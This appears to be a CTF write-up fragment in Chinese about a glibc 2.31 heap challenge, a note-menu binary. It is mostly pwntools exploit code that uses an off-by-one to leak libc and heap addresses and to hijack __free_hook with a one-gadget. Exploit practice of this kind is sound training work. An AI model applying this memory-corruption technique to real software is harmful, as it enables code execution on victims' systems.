fuzz@fuzz-virtual-machine:~/pwnpwnpwn/Libc2.31Training/midpwn$ checksec orz [*] '/home/fuzz/pwnpwnpwn/Libc2.31Training/midpwn/orz' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
基本功能模块
典型的菜单题:
1 2 3 4 5 6 7 8 9
intmenu() { puts("1. add new note."); puts("2. edit a note."); puts("3. show a note."); puts("4. delte a note."); puts("5. exit ."); returnputs("Your choose which one?"); }
defadd(size,content): io.sendlineafter("Your choose which one?\n",str(1)) io.sendlineafter("please input note size : ",str(size)) io.sendafter("please input your note.\n",content)
defedit(idx,content): io.sendlineafter("Your choose which one?\n",str(2)) io.sendlineafter("please input note index.\n",str(idx)) io.sendafter("please input new note.\n",content)
defshow(idx): io.sendlineafter("Your choose which one?\n",str(3)) io.sendlineafter("please input note index.\n",str(idx))
deffree(idx): io.sendlineafter("Your choose which one?\n",str(4)) io.sendlineafter("please input note index.\n",str(idx))
defexp(): # fill up 0xc1 tcache for i inrange(7): add(0xb0,'aaaa') for i inrange(7): free(i) # off-by-one to leak libc_base for i inrange(6): add(0x28,'aaaa')#0-5 edit(0,'b'*0x28+'\xc1') free(1) add(0x28,'flag\x00')#1 show(2) libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-96-0x10-libc.sym['__malloc_hook'] log.success("libc_base====>"+hex(libc_base)) free_hook=libc_base+libc.sym['__free_hook'] # overlapping to leak heap_base for i inrange(3): add(0x28,'cccc')#6-8 <==>2-4 free(2) free(3) show(7) heap_base=u64(io.recv(8))&0xfffffffff000-0x2000 # hijack __free_hook edit(7,p64(free_hook)+b'\x0a') log.success("heap_base====>"+hex(heap_base)) magic=libc_base+0x1518B0 add(0x28,'dddd')#2 add(0x28,p64(magic))#3
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo python3 update_list [+] Commonlist has been saveto"list" [+] Old-release list has been saveto"old_list"
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo ./download 2.31-0ubuntu9.7_amd64 fuzz@fuzz-virtual-machine:/glibc-all-in-one$ cd libs/ fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ ls 2.31-0ubuntu9.7_amd64 fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ cd 2.31-0ubuntu9.7_amd64